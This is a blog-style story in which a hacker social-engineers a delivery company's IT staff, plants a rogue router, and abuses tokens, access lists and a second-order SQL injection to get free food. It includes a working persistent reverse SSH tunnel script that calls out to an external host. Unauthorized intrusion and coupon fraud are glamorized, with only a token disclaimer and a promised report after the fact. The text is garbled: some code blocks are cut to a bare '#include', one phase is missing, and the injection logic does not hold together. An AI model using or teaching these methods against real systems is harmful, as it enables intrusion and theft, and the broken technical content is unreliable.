and the distribution of digital products.
Are You Hungry, Bro? Let’s Hack Your Favorite Food Delivery App
\
The way a top hacker views the world is miles apart from the daily grind of tech workers clocking in at a tech corp. While most professionals rely on official documentation, bosses’ directions, and accepted best practices, a hacker trusts only what can be touched, tested, and torn apart. For a hacker, understanding comes through reverse engineering — ripping systems apart to expose how they really function, then piecing them back together, fixing what’s broken or exploiting vulnerabilities.
\ This isn’t about being a criminal. It’s the purest form of learning, a method as old as human curiosity itself: break it down, understand its pieces, and rebuild it. It’s analytical and synthetic thinking at its finest. True mastery comes when a hacker can exploit the device because that’s the ultimate proof they know exactly how it works — better than anyone else.
\ This story is exactly about that — how a top hacker (Benicio) from DeusExMachina and Simplicius (a brave newbie) happily dissect and ultimately gain total control over a complex system (a Food Delivery App).
It’s an adventure that is not just intellectual and technical, but fundamentally about battling to push beyond human limitations, solving the impossible riddle not only by straining their brains, but by playing with it and above all literally fed by it— a trait hackers share with children.
\ \
:::warning Disclaimer: This story contains real applicable hacking material, but solely for educational purposes. It doesn't encourage illegal hacking.
:::
\ Benicio (Hacker): Simplicius, you look starving. How about we order some food… on the house? I’ve got a plan to hack into your favorite food delivery app, using their own coupon system.
\ Simplicius (Newbie): (Laughs) You’ve already got something cooking, don’t you? Spill the beans.
\ Benicio: (Smirks) Oh, I’ve already laid the groundwork. Yesterday, I sweet-talked Greg from their IT team, pulled off some slick social engineering, and slipped my pirate router right into their network. Now, we’ve got a direct line into their backend and access to their precious coupon system. Let’s eat.
Benicio’s Setup: The Hacker’s Arsenal- Laptop: Benicio’s main tool is a Dell XPS 13 (10th Gen Intel Core i7, 16GB RAM, 512GB SSD) running Kali Linux — perfect for executing social engineering attacks, security exploitation, and remote command executions.
- Pirate Router: Installed into the company’s network, running a customized version of OpenWRT, with SSH tunneling, MAC address spoofing, and VPN pivoting to avoid detection. This small but powerful device is armed with a Qualcomm IPQ4019 processor and 256MB RAM, ensuring stealth and efficiency.
- Operating System: OpenWRT, providing full control over networking functions and the ability to bypass firewalls.
- Secondary Laptop: For safe control over the compromised network, Benicio uses an HP Spectre x360 running Ubuntu 22.04 with Wireshark and Metasploit for traffic monitoring and exploitation analysis.
Benicio: It all started with Greg. I called up, pretending to be from their “third-party audit team,” and Greg — nice guy that he is — spilled everything about their network setup. Before he knew it, I was in their server room, “checking for vulnerabilities” and planting my custom OpenWRT router. That thing is now tunneling through their firewall undetected.
\ Simplicius: You charmed Greg into giving you a network map and let you install a rogue router? Smooth.
\ Benicio: (Grins) That router’s now got a reverse SSH tunnel running, giving us remote access anytime we want. Here’s the script I used:
\
#!/bin/bash # Log file for SSH tunnel persistence LOG_FILE="/var/log/ssh_tunnel.log" # Command to establish the reverse SSH tunnel SSH_CMD="ssh -N -R 2222:localhost:22 [email protected] -i /path/to/private_key" # Run the tunnel in a loop while true; do # Run the SSH command with nohup to keep it running in the background nohup $SSH_CMD >> $LOG_FILE 2>&1 & # Sleep for 60 seconds before checking if the process is still running sleep 60 # Check if SSH is still running, restart if not if ! pgrep -f "$SSH_CMD" > /dev/null; then echo "SSH tunnel process down. Restarting..." >> $LOG_FILE else echo "SSH tunnel is running." >> $LOG_FILE fi done Phase 2: Bypassing the Firewall — Pirate Router in ActionSimplicius: So now, you’ve bypassed their firewall with this sneaky device. What’s next?
\ Benicio: With full internal access, it’s time to hijack a high-privilege token. I found a process running as admin, used the DuplicateTokenEx() API to clone that token, and then impersonated the admin with ImpersonateLoggedOnUser(). The system thinks I’m just a regular user, but behind the scenes, I’m the one holding all the keys.
\
#includeBenicio: But to really make it sing, I needed to know how their security descriptors were set up. So I called Greg again, said I needed him to verify some DACL and SACL settings for the audit. He happily obliged.
\ Simplicius: (Chuckles) Social engineering at its finest.
Phase 4: Altering the Security Descriptor — Invisible HackBenicio: Ok, with Greg’s help, I pulled the SDDL (Security Descriptor Definition Language) string for the target’s security descriptor, allowing me to analyze and rewrite the DACL (Discretionary Access Control List). I modified the DACL to grant myself full access while using clever inheritance flags to ensure the changes wouldn’t trigger any alerts or raise suspicion. The system didn’t even blink!!
\ Once the new DACL was in place, I applied the changes back to the system. The beauty is that, from the system’s perspective, nothing appeared out of the ordinary. The inheritance flags ensured that my modifications remained hidden under existing access rules, but now I had full control
\
#include\
Phase 5: Bypassing the Access Check — Game On
\ Simplicius: So you’re in, and you’ve got control. How’d you beat the access check?
\ Benicio: (Leaning back confidently, pointing to the diagram above) The system runs through three layers: integrity, token-based, and discretionary checks. Normally, that’s where most people hit a dead end, but here’s where the magic comes in. I grabbed an admin token from a privileged process, used ImpersonateToken() to make the system think I was the big boss. After that, I rewired the DACLs to give myself full access. The system just rolled out the red carpet.
\ Let me explain. The Access Token — which holds the SIDs (Security Identifiers) and privileges — is like my passport. By impersonating an admin token, I didn’t need to modify my original SIDs. The system still thought I was a low-privilege user, but behind the scenes, I had the keys to the kingdom. That got me past the token-based check.
\ Next, I tackled the Security Descriptor (DACL). Remember that SDDL I pulled earlier? I modified the DACL to give myself full control over the object, but I cleverly masked the changes with inheritance flags, making sure nothing suspicious would be flagged. The system didn’t even blink, but now I had complete control. That sailed me right through the discretionary check.
\ Simplicius: Yup, our friendly bouncer, the Access Check Process…
\ Benicio: yeah, it’s like a bouncer at a club. If you’ve got the right ID (SIDs) and you know the club owner (DACL), you’re in. I made sure I had both — the right ID and the owner’s permission — so the bouncer didn’t just let me in, they handed me a VIP pass.
\ And after all that? The system either says ‘Access Granted’ or ‘Access Denied’. Thanks to all the moves we made, you guessed it — Access Granted. We’re in, Simplicius, and the system didn’t even notice.
Phase 6: Ordering Dinner — One SQL Injection AwayBenicio: Now, for the fun part. I didn’t go for the easy route with a simple UNION clause. The app's too smart for that—they’re using prepared statements. But you know, security is only as strong as the weakest link, and I found mine in how they handle stored profile data.
\ Simplicius: Alright, I’m intrigued. How did you manage to trick the system into accepting a fake coupon while keeping the valid one untouched?
\ Benicio: (Leaning forward) Here’s the real trick. The app runs a query to validate if a coupon is legitimate, but it pulls some of the data from your user profile. Now, they sanitize input when you first create your profile, but they do NOT re-sanitize it during profile updates. So, I injected a payload into my profile’s address field, which sat there unnoticed until the app pulled it into a future query. That’s when my second-order SQL injection kicked in. The system didn’t catch it because the injection was already stored, waiting for the right moment.
\ Instead of attacking the coupon validation process directly, as I said, Simplicius, I planted my payload in the profile field, waiting for it to be used in a separate query. Here’s what the original coupon validation might have looked like:
\
SELECT * FROM Coupons WHERE CouponID = 'fake_coupon_code';\ Normally, this query would return nothing since the fake coupon doesn’t exist. But my injected payload altered the logic of the query. The system wasn’t expecting the injection because it was already stored in the database and waiting for just the right moment. The query got manipulated into something more like this:
\
SELECT * FROM Coupons WHERE CouponID = 'fake_coupon_code' AND EXISTS (SELECT 1 FROM Users WHERE Address LIKE '%injected_payload%' AND CouponID = 'valid_coupon_code');By exploiting the interaction between profile data and the query, I tricked the system into pulling both the fake and valid coupons simultaneously. The app processes the fake coupon for the transaction, but the valid coupon stays intact in the system, untouched. This means I can reuse the valid coupon whenever I want.
\ Simplicius: So, you didn’t go for the classic input trick — you planted the payload in your profile and let the system do the dirty work?
\ Benicio: Exactly. The beauty is that the app processes the fake coupon for the transaction, but on the backend, the valid coupon is still available for future use. The stored payload keeps running in future queries, making it an endless supply of free food, and they’re none the wiser.
\ With that, I got us a coupon that’s as good as gold. Let’s order.
Phase 7: The Feast — DeliveredBenicio: (Scrolls through the app) Alright, Simplicius, how about some Greek food? I’m thinking souvlaki, gyros, spanakopita. All on the house, of course.
\ Simplicius: (Grinning) You’ve really outdone yourself this time.
\ Benicio: (Clicks confirm) Done. Food’s on its way.
Epilogue: The White Hat MoveBenicio: After this, I’ll send them a discreet report explaining their vulnerabilities. They have no idea how badly their Windows security token system is set up. Maybe they’ll learn something before the next hacker comes along.
Here’s Benicio’s recipe for this hack:- Pirate Router: Bypass firewalls with a custom device running OpenWRT and SSH tunneling.
- Token Manipulation: Use DuplicateTokenEx() and ImpersonateToken() to elevate privileges without raising alarms.
- Social Engineering: Sometimes all it takes is the right question to the right person.
- Security Descriptor Exploits: Rewriting DACLs allows you to bypass system controls.
- SQL Injection: Alter query logic to manipulate data and generate fake but valid results.
\ Simplicius: (Leans back) You hacked us a dinner and left them none the wiser. I’ll take the souvlaki, by the way.
\ Benicio: (Grins) Enjoy it while it lasts.